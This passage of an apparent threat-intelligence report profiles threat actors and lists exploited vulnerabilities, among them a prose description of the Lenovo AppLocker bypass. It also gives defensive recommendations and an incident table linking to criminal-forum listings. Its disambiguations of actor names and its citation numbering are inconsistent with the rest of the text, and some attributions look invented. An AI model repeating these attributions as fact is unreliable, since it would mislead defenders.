_Sentap claims to have obtained “unprecedented” access to cloud infrastructure. Their TTPs include website cloning, bypassing Web Application Firewalls (WAF), and crypto draining.15 A recent notable activity involved advertising the sale of 1.02 terabytes of U.S. property data, allegedly obtained from a U.S.-based title company specializing in property record search services. This data reportedly includes highly sensitive personally identifiable information (PII) such as names, addresses, dates of birth, Social Security numbers, phone numbers, email addresses, mortgage details, and property ownership information. The data spans “strategic” regions including Illinois, Indiana, Wisconsin, Minnesota, Iowa, Colorado, and Kansas, and dates from the 1990s to 2025.15 This signifies a trend where financially motivated actors are expanding their targets beyond typical corporate or financial databases to include specialized, high-value datasets like property records. This data can be used for various forms of fraud, identity theft, or targeted social engineering, indicating a more sophisticated and diversified approach to the monetization of stolen information.

3.10. Scattered Spider

Scattered Spider is a threat actor known for its sophisticated social engineering capabilities.16 The group’s motivations are financial gain, leading to data theft, extortion, and ransomware deployment.16

This group relies heavily on social engineering as a primary initial access vector. They frequently impersonate employees or contractors to deceive IT help desks into granting them access. They also target third-party IT providers to gain entry into larger organizations. Scattered Spider is known for its rapid double-extortion capabilities, demonstrating the ability to breach systems, establish persistence, harvest sensitive data, disable recovery mechanisms, and detonate ransomware across both on-premises and cloud environments within a matter of hours.16 The group conducts extensive reconnaissance to identify and single out high-value individuals, such as Chief Financial Officers (CFOs), and then persuades IT help desk personnel to reset the multi-factor authentication (MFA) devices and credentials tied to these high-value accounts.16 This highlights a critical shift where even technically sophisticated ransomware operations prioritize human manipulation (social engineering) as their primary initial access vector, rather than solely relying on technical exploits. The ability to bypass MFA through help desk manipulation demonstrates a significant vulnerability in organizational identity verification processes, making human vigilance and robust verification protocols paramount. Scattered Spider has been observed conducting attacks against the aviation industry and recently breached an unnamed organization by specifically targeting its CFO.16

3.11. Lazarus Group (Aliases: APT38)

The Lazarus Group, also known as APT38, is comprised of cyber actors from the Democratic People’s Republic of Korea (DPRK).17 Their primary motivation is state-sponsored revenue generation, likely aimed at circumventing international sanctions and funding the regime.17 This demonstrates a clear and sustained strategy by a nation-state to use cybercrime, specifically cryptocurrency theft, as a primary means of funding its operations. This is a significant geopolitical threat, as it means cyberattacks are not just for espionage or disruption, but directly contribute to state finances, impacting global financial security.

The Lazarus Group conducts high-profile international virtual currency heists. Their TTPs involve moving stolen funds across various virtual currency networks, including Ethereum, Binance Smart Chain (BSC), and Polygon, to specific virtual currency addresses.17 In 2023 alone, DPRK cyber actors were responsible for stealing over $200 million in virtual currency. Specific incidents attributed to the Lazarus Group include approximately $41 million from Stake.com in September 2023, $60 million from Alphapo and CoinsPaid in July 2023, and $100 million from Atomic Wallet in June 2023. They were also confirmed responsible for the theft of $100 million from Harmony’s Horizon bridge in June 2022, and attacks against Sky Mavis’ Ronin Bridge.17

3.12. Bl00dy / Clop / LockBit Ransomware Operations (Aliases: Lace Tempest, FIN11, TA505)

These ransomware operations, including Bl00dy, Clop, and LockBit, are often observed exploiting the same vulnerabilities. Microsoft attributes these related campaigns to Lace Tempest, which correlates with the FIN11 and TA505 threat actor groups.19 Their motivation is financial gain, achieved through ransomware deployment and data exfiltration for extortion.19

These groups actively exploit critical server vulnerabilities, such as those found in PaperCut MF/NG (CVE-2023-27350 and CVE-2023-27351). These vulnerabilities allow for unauthenticated remote code execution and the retrieval of user data, including hashed passwords for internal users.19 The exploitation of these flaws enables the deployment of ransomware to encrypt and exfiltrate data from target systems. These groups are known for rapidly operationalizing newly disclosed vulnerabilities, as evidenced by their exploitation of zero-day vulnerabilities in the GoAnywhere MFT platform.19 The fact that multiple, distinct ransomware groups are quickly leveraging the same critical vulnerabilities shortly after disclosure indicates that the window for organizations to patch critical vulnerabilities before active exploitation is extremely narrow, underscoring the urgency of vulnerability management. The education sector has been a notable target for the Bl00dy ransomware gang.19

3.13. GhostSec (Aliases: GhostSecMafia, GSM)

GhostSec, also known by aliases like GhostSecMafia and GSM, is described as a highly organized hacktivist group with reported ties to members of the “Anonymous” hacktivist collective.20 While specific political motivations are not detailed in the provided information, their classification as hacktivists implies an ideological drive.20

A distinctive TTP of GhostSec is its operation of a subscription-based premium channel on Telegram. Through this channel, the group shares exclusive content, including leaks and tutorials, with its subscribers.20 This suggests a move towards monetizing their activities or knowledge. The group is highly organized, reportedly comprising approximately 16 active members, each assigned specific roles such as gaining initial access, privilege escalation, or lateral movement. They also provide mutual support to members who face police investigations, indicating a high level of cooperation and internal structure.20 This level of internal structure and monetization is unusual for traditional, loosely affiliated hacktivist groups, suggesting a professionalization of hacktivism where groups adopt more structured operations and even financial models, potentially increasing their sustainability and impact beyond spontaneous, ad-hoc attacks.

3.14. Z-PENTEST ALLIANCE

The Z-PENTEST ALLIANCE first emerged in October 2023, with a probable origin in Serbia, maintaining close ties to pro-Russian actors. The group frequently collaborates with other entities such as SECTOR16, OverFlame, and People’s Cyber Army (PCA) to coordinate attacks and share resources.21

The group’s motivations are primarily geopolitical. Their attacks aim to weaken industrial and control systems (ICS/SCADA) in Western countries, thereby strengthening Russia’s geopolitical influence by exploiting technological vulnerabilities. They also seek to undermine Western solidarity and create divisions within NATO.21 This strategic focus on critical infrastructure for geopolitical ends demonstrates a direct intent for disruptive and potentially destructive cyber warfare against essential services.

Z-PENTEST ALLIANCE is distinguished by its ability to penetrate operational technology (OT) systems in critical infrastructures. Their TTPs include developing specialized tools to penetrate OT systems, exploiting vulnerabilities in ICS/SCADA, and leveraging zero-day vulnerabilities, often acquired from the dark web or through collaboration with other groups. They employ social engineering techniques to obtain sensitive information or system access and utilize information from data leaks to prepare and execute larger, more targeted attacks. The group coordinates its attacks on Telegram and private forums, and uses X (formerly Twitter) for propaganda and to amplify the impact of their operations. They also release videos showcasing their access to critical systems to instill fear and uncertainty in their victims.22 The group mainly targets the energy (oil and gas) and water sectors, aiming to disrupt critical functions such as water pumping, gas and oil distribution management.22 The use of zero-day vulnerabilities and collaboration with other pro-Russian groups further indicates a sophisticated, coordinated, and state-aligned effort to achieve strategic geopolitical objectives through cyber means. This represents a significant escalation in cyber conflict, moving beyond data theft to direct operational disruption.

3.15. Disambiguation of Non-Threat Actors / Misnomers

Several terms in the query do not refer to specific malicious threat actors but rather to broader concepts, legitimate entities, or fictional elements. Clarifying these distinctions is crucial for accurate threat intelligence.

  • CrakX_Combo: This term describes the challenge of inconsistent threat actor naming conventions across the cybersecurity industry. Microsoft and CrowdStrike are actively collaborating to align their individual threat actor taxonomies, publishing a new joint mapping to reduce confusion and improve intelligence sharing. Examples include Microsoft’s Midnight Blizzard (formerly Nobelium) also being known as APT29, BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, and The Dukes.23 This highlights a meta-challenge within threat intelligence itself.
  • Dimitry_S: The intelligence refers to two distinct, prominent cybersecurity experts: Dmitry Bestuzhev, Senior Director of Cyber Threat Intelligence at BlackBerry, known for his research on financially motivated targeted attacks 24, and Dmitry Volkov, CEO of Group-IB, a cybersecurity veteran involved in cyber investigations and identifying notorious threat actors like Cobalt, Silence, MoneyTaker, and Lazarus.25 Neither individual is a malicious threat actor.
  • gravity: This term refers to the concept of “Center of Gravity (COG)” analysis, a strategic framework used in military and hybrid threat contexts for understanding adversaries.26 It is a theoretical concept for strategic analysis, not a specific malicious entity involved in cyber breaches.
  • Leonsky / Darkfirefox / MR4cX / zdclub / l33tfg / C3FaRiR / injectioninferno: These names do not correspond to any identified threat actors or their aliases within the provided intelligence. The associated intelligence snippets discuss other, distinct threat actors or general cybersecurity concepts.27 Their presence in the query may be a placeholder, misspelling, or reference to entities not covered by the available intelligence.
  • MartinL: This term likely refers to Lockheed Martin, a prominent defense contractor recognized for developing the Cyber Kill Chain framework, a critical model for identifying and preventing cyber intrusions.32 The provided intelligence discusses general threat actor types and Lockheed Martin’s contributions to cybersecurity 32, not a malicious actor named “MartinL.”
  • whiterose: This is a fictional character from the TV series “Mr. Robot,” portrayed as a cyber-terrorist and leader of the “Dark Army”.41 This is a fictional entity, and its inclusion underscores the potential for confusion between real and fictional cyber threats.
  • CKD69: This appears to be a medical reference (Chronic Kidney Disease) and has no relevance to cybersecurity or threat actors in the provided intelligence. Its presence in the research material is likely an artifact or a misdirection.

Table 2: Threat Actor Quick Reference

This table offers a concise summary of each researched threat actor, facilitating easy comparison and understanding of their characteristics, motivations, and common TTPs. It serves as a rapid lookup for key actor intelligence.

Threat Actor NameKnown AliasesPrimary MotivationKey TTPsNotable Targets
LIUSHENAPT15, UNC5174, PurpleHazeState-sponsored espionage, digital extortionORB network, CVE exploitation, access transferManufacturing, government, finance, telecommunications, research, IT services
KrimCoSodinokibi, REvil, Gold Southfield, UNKN, Unknown, White UrsiaFinancial gain (RaaS)Double extortion, RaaS model, language-based attack abortionArtech Information Systems, various organizations (data leaks)
TH3 EL1T3 GHOSTGhost Squad Hackers (GSH)Political/Ideological (hacktivism)DDoS, defacement, data leaksCentral banks, Fox News, CNN, US Armed Forces, Israeli gov, Donald Trump, KKK, BLM
PryxHolyPryx, Sp1d3r (Hellcat group)Financial gain, political (anti-Israel)Server-side stealers (Tor-based), double extortion, Jira credential exploitationSchneider Electric, Telefónica, Orange Romania, government systems
Team_CROHacking TeamCommercial profit (selling surveillance tools)RCS tools (covert data collection, keystroke logging, camera/mic activation, GPS, rootkits, crypto exfil)Governments, law enforcement, corporations (Barclays, BT, Deutsche Bank), Mexican drug cartels
Storm-0539Atlas LionFinancial gain (gift card/payment fraud)Phishing/smishing, device registration for persistence, cloud resource abuse, nation-state TTPsGift card issuers, retailers
Handala Hack GroupGeopolitical (pro-Palestinian)Phishing, ransomware (double extortion), defacement, PA system disruption, wipers (Hamsa, Hatef)Israeli critical infrastructure, kindergartens, DRS RADA, Ma’agan Michael Kibbutz, Zerto, Soreq Nuclear Research Center, radar systems
Ghost Ransomware GroupCring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, RaptureFinancial gainExploiting outdated software, web shells, Cobalt Strike, Mimikatz, disabling AV, rapid deploymentCritical infrastructure, healthcare, schools, government, tech, manufacturing (70+ countries)
_SentapFinancial gainWebsite cloning, WAF bypass, crypto draining, selling large datasetsUS property title companies (1.02 TB property data)
Scattered SpiderFinancial gain (data theft, extortion, ransomware)Social engineering (IT help desk impersonation), MFA bypass, rapid double extortion, extensive reconnaissanceAviation industry, CFOs, third-party IT providers
Lazarus GroupAPT38State-sponsored revenue generation (DPRK)Virtual currency heists, fund movement across crypto networksStake.com, Alphapo, CoinsPaid, Atomic Wallet, Harmony’s Horizon bridge, Sky Mavis’ Ronin Bridge
Bl00dy / Clop / LockBit Ransomware OperationsLace Tempest, FIN11, TA505Financial gain (ransomware, extortion)Exploiting critical server vulnerabilities (PaperCut), RCE, data exfiltration, rapid operationalization of 0-daysEducation sector, organizations with PaperCut vulnerabilities
GhostSecGhostSecMafia, GSMIdeological (hacktivism)Subscription-based Telegram channel (leaks, tutorials), organized roles, mutual supportNot specified in provided intelligence
Z-PENTEST ALLIANCEGeopolitical (pro-Russian)Penetrating OT/ICS/SCADA, zero-day exploitation, social engineering, propaganda, fear tacticsEnergy (oil/gas) and water sectors in Western countries

This section synthesizes information from individual incidents and actor profiles to identify broader trends and evolving Tactics, Techniques, and Procedures (TTPs) in the current threat landscape.

4.1. Convergence of TTPs Across Threat Actor Categories

A significant trend observed is the increasing blurring of lines between financially motivated cybercriminals and nation-state actors. Financially driven groups are adopting sophisticated techniques traditionally associated with state-sponsored espionage. For instance, Storm-0539, a group focused on gift card fraud, employs reconnaissance and cloud environment leverage techniques that are strikingly similar to those observed from nation-state actors.8 This indicates a professionalization within cybercrime, where advanced capabilities are becoming more accessible or are being shared and adopted across different threat actor types. Similarly, Pryx, while primarily financially motivated through the Hellcat ransomware, also exhibits clear geopolitical leanings and develops novel malware like server-side stealers.5 This means that the operational methods of various threat actors are no longer neatly confined to traditional categories. Consequently, defenders cannot solely rely on actor categorization to predict TTPs, and must instead focus on robust, comprehensive defenses against a wide array of advanced techniques, regardless of the ultimate motivation.

4.2. Escalation of Critical Infrastructure Targeting

Geopolitically motivated groups, some with suspected state affiliations, are increasingly focusing their attacks on critical infrastructure sectors such as energy, water, healthcare, and government. Their objectives often extend beyond data theft to direct disruption or strategic influence. The Z-PENTEST ALLIANCE, with its ties to pro-Russian actors, specifically targets operational technology (OT) and industrial control systems (ICS/SCADA) in Western countries’ energy and water sectors. Their stated aim is to weaken these systems and thereby strengthen Russia’s geopolitical influence.21 Concurrently, the Handala Hack group, linked to Iran’s Ministry of Intelligence, has targeted Israeli critical infrastructure, including kindergartens (disrupting public address systems), radar systems, and even a nuclear research center. This group has also engaged in destructive data deletion, claiming to have exfiltrated and deleted a massive 51 terabytes of data from a Hewlett Packard Enterprise subsidiary.9 This consistent targeting and the destructive capabilities employed signify a shift towards more impactful cyber operations with direct geopolitical consequences, representing a significant escalation in cyber conflict that moves beyond traditional espionage to direct operational disruption.

4.3. Rapid Operationalization of Vulnerabilities

Newly disclosed critical vulnerabilities are being rapidly weaponized and exploited by multiple threat actors, significantly narrowing the window for organizations to patch and mitigate risks. The active exploitation of critical PaperCut server vulnerabilities (CVE-2023-27350, CVE-2023-27351) by multiple ransomware groups, including Bl00dy, Clop, and LockBit, shortly after their disclosure, exemplifies this speed.19 The fact that these vulnerabilities were “detected as being actively exploited in the wild by cyber threat actors” 19 underscores the rapid time-to-exploit. Furthermore, the advertisement on dark forums of a “buffer overflow 0day vulnerability” for OpenSSH 10.0p2 highlights that critical software components are under constant scrutiny, and flaws are quickly traded and weaponized in the underground. This “race to exploit” dynamic means that the window for organizations to patch critical vulnerabilities before active exploitation is extremely narrow, underscoring the urgency of vulnerability management and implying that reactive patching alone is often insufficient.

4.4. The Pervasive Risk of Commercial Spyware and Dual-Use Tools

The existence and proliferation of commercial surveillance tools, even those developed for “lawful” purposes, pose a significant risk when they fall into the wrong hands or are misused. The case of Hacking Team, a company that sold advanced intrusion and surveillance capabilities, illustrates this danger. Their software was reportedly used by corrupt Mexican officials to target journalists on behalf of drug cartels.7 This exemplifies a dual-use scenario where tools intended for legitimate purposes are diverted for illicit activities. Moreover, Hacking Team’s own major data breach in 2015, which leaked their source code and internal documents, meant that these powerful tools became accessible to a wider range of malicious actors.7 This effectively democratizes sophisticated cyber capabilities, empowering non-state actors with state-level tools and highlighting a broader implication for national security and human rights, necessitating stricter controls and oversight on the development and sale of such technologies.

4.5. The Human Element as a Critical Attack Surface

Social engineering continues to be a highly effective and frequently used initial access vector, even for advanced threat actors, underscoring the enduring importance of human vigilance and robust identity verification. Scattered Spider’s primary reliance on “social engineering techniques, often impersonating employees or contractors to deceive IT help desks into granting access” 16 exemplifies this. Their ability to bypass multi-factor authentication (MFA) through manipulating help desk personnel to reset MFA devices and credentials 16 demonstrates a significant vulnerability in organizational identity verification processes. Similarly, Storm-0539 extensively uses phishing and smishing tactics for initial access.8 This consistent emphasis across different actor profiles indicates that technical controls alone are insufficient if human vulnerabilities are not addressed through comprehensive training and stringent verification processes. This means that security awareness training, coupled with multi-factor authentication and strict identity verification protocols for sensitive operations (like password resets), is paramount.

4.6. Dark Web Market Dynamics and Law Enforcement Impact

Dark web forums remain central to the cybercrime ecosystem for trading stolen data and access, but they are subject to ongoing law enforcement disruptions, leading to shifts in actor activity and forum landscapes. The arrests of prominent actors like IntelBroker and ShinyHunters, and the repeated disruption and re-launch attempts of BreachForums, illustrate law enforcement’s active impact on these marketplaces.30 Despite these disruptions, new forums consistently emerge, and actors adapt their operations. The numerous inaccessible dark forum links in the provided intelligence, despite the questions associated with them indicating active data sales (e.g., AKB48 database , Subway Guatemala 42, Indian Vodafone 43, Russian Military Unit data 44, various PII and RDP access ), reinforce the ephemeral and dynamic nature of these underground markets. This implies that while law enforcement can achieve significant successes, the underlying market for illicit data and access persists and quickly adapts, requiring continuous monitoring of the shifting underground landscape.

5. Vulnerabilities Highlighted

This section details specific vulnerabilities that have been actively exploited or discussed in the context of recent incidents, providing technical context and implications.

5.1. OpenSSH 10.0p2 Security Advisory (CVE-2025-32728 and Reported 0-day)

CVE-2025-32728 affects sshd in OpenSSH before version 10.0. The DisableForwarding directive, intended to disable X11 and agent forwarding, does not adhere to its documentation, potentially leaving these functionalities exposed despite configuration.45 This vulnerability is currently rated as having moderate severity. Beyond this publicly disclosed CVE, there was an advertisement on dark forums for a “buffer overflow 0day vulnerability” specifically for OpenSSH 10.0p2.46 While the specific link is inaccessible, the presence of such a claim in underground channels indicates active interest in weaponizing flaws in this critical software.

OpenSSH is a foundational component for secure remote access in many environments. Any vulnerability, particularly a zero-day or a misconfiguration flaw that undermines intended security controls, can provide attackers with a critical foothold for initial access, lateral movement, and data exfiltration. The rapid discussion and potential exploitation of such flaws in underground forums underscore the urgency for organizations to monitor and apply patches for OpenSSH and similar widely used software components. The combination of a publicly known flaw and a reported zero-day in the same software version highlights the intense scrutiny and rapid weaponization of critical software, implying that even well-maintained software can have undisclosed or newly discovered vulnerabilities, and the window for defense is shrinking.

5.2. Lenovo MFGSTAT.zip AppLocker Bypass Vulnerability

A significant vulnerability affects Lenovo computers that ship with the manufacturer’s default Windows image. The file C:\Windows\MFGSTAT.zip has insecure file permissions, allowing any authenticated user on the system to write to it. Under default AppLocker rules, any executable within the C:\Windows directory is permitted to run, making this a problematic configuration.47

Attackers can leverage Windows’ Alternate Data Streams (ADS) to add a malicious binary to MFGSTAT.zip without overwriting the original file. This malicious payload can then be executed using legitimate Windows utilities, such as appvlp.exe from Microsoft Office, effectively bypassing AppLocker’s application whitelisting restrictions.47 Lenovo’s Product Security Incident Response Team (PSIRT) acknowledged this issue but opted not to release a patch. Instead, the company published guidance recommending the manual removal of the vulnerable file.47 This decision shifts the burden of mitigation to end-users and organizations, highlighting the critical importance of scrutinizing default file permissions, especially in system directories. The file has been a source of user concern for years due to its password-protected nature and its presence in the Windows directory , indicating a long-standing oversight that now requires manual intervention for security. This implies that organizations must conduct thorough security audits of pre-installed software and default configurations, as relying solely on vendor patches may not be sufficient.

5.3. PaperCut Server Vulnerabilities (CVE-2023-27350, CVE-2023-27351)

Two critical vulnerabilities have been identified in PaperCut MF and NG software: CVE-2023-27350, which allows unauthenticated remote code execution, and CVE-2023-27351, which permits unauthenticated data retrieval, including hashed passwords for internal users.19

These vulnerabilities have been actively exploited in the wild by multiple ransomware groups, including Bl00dy, Clop, and LockBit (which are also tracked as Lace Tempest, FIN11, and TA505).19 The exploitation of these flaws allows adversaries to achieve remote code execution, exfiltrate sensitive data, and deploy ransomware. The software developer confirmed that both vulnerabilities were detected as being actively exploited by cyber threat actors.19 The rapid and widespread exploitation of these vulnerabilities by financially motivated ransomware groups underscores the critical importance of immediate patching for publicly exposed applications. The ability to achieve remote code execution and steal credentials makes these flaws highly attractive to adversaries seeking initial access and privilege escalation. This means that the speed of patching must match or exceed the speed of exploitation, especially for internet-facing services, to prevent widespread compromise.

6. Recommendations for Enhanced Defense

Based on the observed incidents, threat actor TTPs, and highlighted vulnerabilities, the following recommendations are crucial for strengthening organizational cybersecurity posture.

6.1. Prioritize and Accelerate Patch Management

Organizations must implement a stringent and rapid patch management policy, particularly for internet-facing applications and critical infrastructure components. Given the “hack before we patch” strategy employed by groups like Ghost ransomware 13, the window for mitigation is extremely narrow. Actionable steps include automating vulnerability scanning and patch deployment where feasible, establishing clear Service Level Agreements (SLAs) for patching critical and high-severity vulnerabilities, and subscribing to vendor security advisories and CISA’s Known Exploited Vulnerabilities (KEV) catalog for timely alerts.19

6.2. Strengthen Identity and Access Management (IAM) & MFA Enforcement

Enhancing identity verification processes is paramount, especially for IT help desks and privileged account actions such as multi-factor authentication (MFA) resets. Organizations should implement robust MFA across all accounts, particularly for administrative and critical business systems. Employees must be educated on social engineering tactics, including phishing and smishing, and IT support staff should be rigorously trained on verifying identities for sensitive requests.8 Continuous monitoring for suspicious device registrations and MFA bypass attempts is also essential.

6.3. Fortify Operational Technology (OT) and Industrial Control Systems (ICS) Security

Organizations operating critical infrastructure within sectors like energy, water, and manufacturing must implement specialized security measures for their OT/ICS environments. This involves isolating OT networks from IT networks to prevent lateral movement of threats. Implementing strong access controls and continuous monitoring for anomalous activity within ICS/SCADA systems is crucial. Regular vulnerability assessments and penetration tests specifically tailored to OT environments are also recommended to identify and mitigate unique risks.21

6.4. Enhance Supply Chain and Third-Party Risk Management

It is critical to scrutinize pre-installed software and default configurations from hardware vendors and to implement robust security assessments for third-party IT providers and partners. Organizations should audit default file permissions on newly acquired systems, following vendor guidance such as the removal of the Lenovo MFGSTAT.zip file.47 Implementing strict contractual security requirements for third-party vendors and regularly auditing their security posture, especially if they have access to internal systems, is vital.16

6.5. Implement Comprehensive Data Protection and Backup Strategies

Protecting sensitive data from exfiltration and ensuring rapid recovery from ransomware attacks are fundamental. Organizations should regularly back up critical data, storing copies offline or in segmented, immutable environments. Implementing data loss prevention (DLP) solutions can help prevent unauthorized data exfiltration. Encrypting sensitive data at rest and in transit adds another layer of defense. Developing and regularly testing incident response and disaster recovery plans, including specific playbooks for ransomware and data exfiltration scenarios, is also crucial.9

6.6. Leverage Advanced Threat Intelligence

Integrating up-to-date threat intelligence is essential for understanding adversary motivations, TTPs, and emerging campaigns. Organizations should subscribe to reputable threat intelligence feeds and utilize frameworks like MITRE ATT&CK to map observed adversary behaviors to known techniques. Conducting proactive threat hunting based on intelligence can help detect early indicators of compromise.27 Paying close attention to reports on commercial spyware proliferation and dark web market trends can provide early warnings of new threats.

6.7. Continuous Security Awareness Training

Regularly training all employees on the latest cyber threats is paramount, with a focus on recognizing phishing, smishing, and social engineering attempts. Organizations should conduct simulated phishing exercises and provide clear guidelines on reporting suspicious activity. Emphasizing the importance of strong password hygiene and the proper use of multi-factor authentication (MFA) can significantly reduce the human attack surface.8

7. All Incidents Data

Incident IDDate ReportedTarget Sector/EntityAttack TypePrimary Threat ActorKey ImpactPublished URLScreenshots
12025-07-04T12:01:07ZAKB48 (Music), JapanData BreachLIUSHEN2.9 GB of membership and user-related records for sale.https://darkforums.st/Thread-AKB48-DATABASE-HQ-MEMBERSHIP-AND-USERhttps://d34iuop8pidsy8.cloudfront.net/4b62a429-b756-4f99-b8fd-37d97fd7f630.png
22025-07-04T11:55:20ZCrypto Users (Various Platforms)Data LeakKrimCoMerged crypto-related databases (emails, names, phones, wallets, addresses, partial IDs).https://forum.exploit.in/topic/261901/?do=findComment&comment=1579277https://d34iuop8pidsy8.cloudfront.net/8646b678-4659-43be-b342-f592adf4d6a2.PNG, https://d34iuop8pidsy8.cloudfront.net/762f49b3-cc3c-4fb8-a755-b0e17d4b137a.PNG
32025-07-04T11:24:37ZSubway (Restaurants), GuatemalaData BreachCrakX_Combo3.7M records including names, transaction IDs, unhashed employee credentials, emails, etc.https://darkforums.st/Thread-Selling-Subway-Guatemala-Database-52904-Email-Full-name-Txn-Employe-pswds-Gift-Codeshttps://d34iuop8pidsy8.cloudfront.net/23b62fee-b80b-447e-a3e1-1d95b4f28de6.png, https://d34iuop8pidsy8.cloudfront.net/efd3cc60-7f6b-496c-993f-ae3411527413.png
42025-07-04T11:07:05ZRod Gill Photography (Photography), AustraliaDefacementTH3 EL1T3 GHOSTWebsite defacement.https://t.me/c/2656447819/67https://d34iuop8pidsy8.cloudfront.net/d8f81098-f99a-4956-8af6-c1d61a5b79de.png, https://d34iuop8pidsy8.cloudfront.net/d1dac6d3-423e-44d8-8109-014617a907e8.png
52025-07-04T11:06:45ZBlanceran Village Government (Government Administration), IndonesiaDefacementTH3 EL1T3 GHOSTWebsite defacement.https://t.me/c/2656447819/67https://d34iuop8pidsy8.cloudfront.net/48fceae5-4ab9-4503-ac3d-b8953210a0e4.png, https://d34iuop8pidsy8.cloudfront.net/c585ddc1-a112-4a54-850a-67323ee67ecd.png
62025-07-04T11:06:24ZEden Farm Wellness (Agriculture & Farming), AustraliaDefacementTH3 EL1T3 GHOSTWebsite defacement.https://t.me/c/2656447819/67https://d34iuop8pidsy8.cloudfront.net/49b54bb2-9b8b-4533-9843-d7713e158cc2.png, https://d34iuop8pidsy8.cloudfront.net/c4cd9e23-083c-4c81-bf38-0031c6b9de98.png
72025-07-04T11:05:59ZSamudera Digital (Software Development), IndonesiaDefacementTH3 EL1T3 GHOSTWebsite defacement.https://t.me/c/2656447819/67https://d34iuop8pidsy8.cloudfront.net/ed4bd8e8-afa5-4afa-b4c1-8d41520f5aa1.png, https://d34iuop8pidsy8.cloudfront.net/c1f64128-1104-4d1c-94d9-600135ee2ff9.png
82025-07-04T11:03:02ZSouth Breeze School BD (Education), BangladeshData BreachRXYStudent records including passport numbers, names, DOB, addresses, parent contacts, emails, academic info, payment status.https://darkforums.st/Thread-Source-Code-SOUTH-BREEZE-SCHOOL-BANGLADESH-DATA-BASEhttps://d34iuop8pidsy8.cloudfront.net/6ff77567-407f-4fc2-8818-b0f869631b2.png
92025-07-04T09:57:02ZVodafone (Network & Telecommunications), IndiaData BreachTeam_CRO99,936 user records (names, phone numbers, emails, company names).https://darkforums.st/Thread-Selling-INDIAN-VODAPHONE-DATA-IS-FOR-SELLhttps://d34iuop8pidsy8.cloudfront.net/19e9d410-75d1-4fd2-b90c-1301254b7248.png
102025-07-04T08:34:58ZUnidentified Brazilian Company (Unspecified Industry), BrazilInitial AccessDimitry_SRDP access with domain management capabilities, 150+ public records, 70M BRL revenue.https://forum.exploit.in/topic/261896/?tab=comments#comment-1579251https://d34iuop8pidsy8.cloudfront.net/4d492c10-3121-4a0a-83fe-5c98830d6bc9.png
112025-07-04T08:23:43ZXella Romania (Building and Construction), RomaniaInitial AccessZ-ALLIANCEFull access to Trassir surveillance systems (live feeds, archived footage, reports, configs).https://t.me/Z_alliance_ru/325https://d34iuop8pidsy8.cloudfront.net/6788316a-fa4b-4857-9247-aaaf2bb939b2.png, https://d34iuop8pidsy8.cloudfront.net/

Works cited

  1. Threat Actor Profile – GhostSec – Outpost24, accessed July 4, 2025, https://outpost24.com/blog/threat-actor-profile-ghostsec/
  2. accessed January 1, 1970, https://darkforums.st/Thread-Selling-Subway-Guatemala-Database-52904-Email-Full-name-Txn-Employe-pswds-Gift-Codes
  3. Dmitry Volkov | Group-IB Author, accessed July 4, 2025, https://www.group-ib.com/author/dmitry-volkov/
  4. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed July 4, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
  5. accessed January 1, 1970, https://darkforums.st/Thread-Selling-INDIAN-VODAPHONE-DATA-IS-FOR-SELL
  6. accessed January 1, 1970, https://ramp4u.io/threads/applocker-bypass-on-lenovo-machines-%E2%80%93-the-curious-case-of-mfgstat-zip.3249/
  7. Threat Actor Cards – Recorded Future, accessed July 4, 2025, https://www.recordedfuture.com/support/threat-actor-cards
  8. openssh-10.0p2-2.1 RPM for x86_64 – RPMfind, accessed July 4, 2025, https://rpmfind.net/linux/RPM/opensuse/tumbleweed/x86_64/openssh-10.0p2-2.1.x86_64.html
  9. What is a Threat Actor? Types & Examples – SentinelOne, accessed July 4, 2025, https://www.sentinelone.com/cybersecurity-101/threat-intelligence/threat-actor/
  10. accessed January 1, 1970, https://xss.is/threads/141217/
  11. accessed January 1, 1970, https://darkforums.st/Thread-TLALNEPANTLA-EDOMEX
  12. April 26: Top Threat Actors, Malware, Vulnerabilities and Exploits – Picus Security, accessed July 4, 2025, https://www.picussecurity.com/resource/blog/april-26-top-threat-actors-malware-vulnerabilities-and-exploits
  13. accessed January 1, 1970, https://darkforums.st/Thread-Source-Code-INDIAN-JOURNAL-OF-PRACTICAL-PEDIATRICS-DATA-BASE
  14. Mr. Robot – Wikipedia, accessed July 4, 2025, https://en.wikipedia.org/wiki/Mr._Robot
  15. 202308161700_China-Based Threat Actor Profiles_TLPCLEAR – HHS.gov, accessed July 4, 2025, https://www.hhs.gov/sites/default/files/china-based-threat-actor-profiles-tlpclear.pdf
  16. U.S. Targets RedLine and META Infostealers in Operation Magnus – Picus Security, accessed July 4, 2025, https://www.picussecurity.com/resource/blog/us-targets-redline-and-meta-infostealers-in-operation-magnus
  17. accessed January 1, 1970, https://xss.is/threads/141212/
  18. accessed January 1, 1970, https://xss.is/threads/141213/
  19. Handala Hack: What We Know About the Rising Threat Actor – Cyberint, accessed July 4, 2025, https://cyberint.com/blog/threat-intelligence/handala-hack-what-we-know-about-the-rising-threat-actor/
  20. accessed January 1, 1970, https://forum.exploit.in/topic/261885/
  21. accessed January 1, 1970, https://darkforums.st/Thread-Russian-Military-Unit-11387-Database-Sensitive-Internal-Data
  22. accessed January 1, 1970, https://darkforums.st/Thread-OpenSSH-10-0p2-portable-verion-Buffer-overflow-0day-vulnerability
  23. Iranian hacker group targets Israeli kindergartens’ PA systems | Iran International, accessed July 4, 2025, https://www.iranintl.com/en/202501265679
  24. Flash Report: Prominent Threat Actors Reportedly Arrested – ZeroFox, accessed July 4, 2025, https://www.zerofox.com/intelligence/flash-report-prominent-threat-actors-reportedly-arrested/
  25. Ghost Squad Hackers – Wikipedia, accessed July 4, 2025, https://en.wikipedia.org/wiki/Ghost_Squad_Hackers
  26. accessed January 1, 1970, https://darkforums.st/Thread-Leak-Docs-From-Star-Assurance-Tunisie-Agence
  27. Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group – The Hacker News, accessed July 4, 2025, https://thehackernews.com/2025/06/over-70-organizations-across-multiple.html
  28. Threat Actor Profile – Sodinokibi ransomware – Outpost24, accessed July 4, 2025, https://outpost24.com/blog/threat-actor-profile-sodinokibi-ransomware/
  29. Threat Actor Spotlight: Pryx – Morado Intelligence, accessed July 4, 2025, https://www.morado.io/blog-posts/threat-actor-spotlight-pryx
  30. Hellcat Hacking Group Unmasked: Investigating Rey and Pryx | KELA Cyber, accessed July 4, 2025, https://www.kelacyber.com/blog/hellcat-hacking-group-unmasked-rey-and-pryx/
